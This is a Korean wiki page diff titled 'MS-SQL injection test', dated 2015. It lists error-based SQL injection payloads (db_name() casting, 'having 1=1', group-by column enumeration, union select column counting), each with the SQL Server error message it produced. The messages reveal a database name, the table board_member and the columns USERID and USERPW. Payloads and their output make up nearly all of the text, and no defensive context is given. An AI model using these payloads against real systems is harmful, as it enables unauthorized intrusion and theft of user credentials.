"MS-SQL 인젝션 테스트"의 두 판 사이의 차이

2015년 1월 20일 (화) 11:03 판

' and db_name()=1 --

-- com.microsoft.sqlserver.jdbc.SQLServerException: nvarchar 값 'jmdb'을(를) 데이터 형식 int(으)로 변환하지 못했습니다.

' having 1=1 --

com.microsoft.sqlserver.jdbc.SQLServerException: 열 'member.IDX'이(가) 집계 함수나 GROUP BY 절에 없으므로 SELECT 목록에서 사용할 수 없습니다.

' group by board_member.IDX having 1=1 --

com.microsoft.sqlserver.jdbc.SQLServerException: 열 'board_member.USERID'이(가) 집계 함수나 GROUP BY 절에 없으므로 SELECT 목록에서 사용할 수 없습니다.

' group by board_member.IDX, board_member.USERID having 1=1 --

com.microsoft.sqlserver.jdbc.SQLServerException: 열 'board_member.USERPW'이(가) 집계 함수나 GROUP BY 절에 없으므로 SELECT 목록에서 사용할 수 없습니다.

...

' union select '1','2','3','4

com.microsoft.sqlserver.jdbc.SQLServerException: UNION, INTERSECT 또는 EXCEPT 연산자를 사용하여 결합된 모든 쿼리의 대상 목록에는 동일한 개수의 식이 있어야 합니다.

' union select '1','2','3','4','5

com.microsoft.sqlserver.jdbc.SQLServerException: 문자열을 datetime으로 변환하지 못했습니다.

' union select '1','2','3','4',5--

@@ 2번째 줄: / 2번째 줄: @@
 ;MS-SQL 인젝션 테스트
+* DB명 확인
 <source lang='text'>
 ' and db_name()=1 --
@@ 9번째 줄: / 10번째 줄: @@
 </source>
+* 테이블명 확인
 <source lang='text'>
 ' having 1=1 --
@@ 15번째 줄: / 17번째 줄: @@
 com.microsoft.sqlserver.jdbc.SQLServerException: 열 'member.IDX'이(가) 집계 함수나 GROUP BY 절에 없으므로 SELECT 목록에서 사용할 수 없습니다.
 </source>
+* 컬럼명 확인
 <source lang='text'>
 ' group by board_member.IDX having 1=1 --
@@ 29번째 줄: / 33번째 줄: @@
 ...
+* DB명 확인
 <source lang='text'>
 </source>
@@ 38번째 줄: / 43번째 줄: @@
 </source>
+* 기타
 <source lang='text'>
 ' union select '1','2','3','4','5